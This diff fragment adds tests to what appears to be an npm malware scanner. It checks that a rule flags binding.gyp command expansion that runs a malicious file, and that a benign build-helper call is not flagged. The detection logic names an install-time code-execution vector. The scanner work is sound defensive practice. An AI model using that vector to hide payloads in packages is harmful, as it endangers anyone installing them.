+    assert((r.summary.riskScore || 0) >= 20, `score should cross the alert threshold, got ${r.summary.riskScore}`);
+    const p = (r.threats || []).find(t => t.type === 'gyp_phantom_exec');
+    assert(p && (p.rule_id === 'MUADDIB-COMPOUND-017' || p.rule === 'MUADDIB-COMPOUND-017'), 'compound carries the rule id');
+  });
+
+  test('e2e (FPR guard): benign native addon <!(node ./util/has_lib.js) → NO gyp_phantom_exec', () => {
+    const r = scanJson('tests/samples/phantom-gyp/benign');
+    const types = new Set((r.threats || []).map(t => t.type));
+    assert(!types.has('gyp_phantom_exec'), 'benign build-helper invocation must NOT trigger the compound');
+  });
+}
+
+module.exports = { runPhantomGypTests };


### PR DESCRIPTION
Correlateur gyp_phantom_exec (MUADDIB-COMPOUND-017): binding.gyp <!(node x.js) x verdict malveillant independant du fichier invoque. FP=0 par construction. 10/10 tests, 259 RULES, 30 HC types.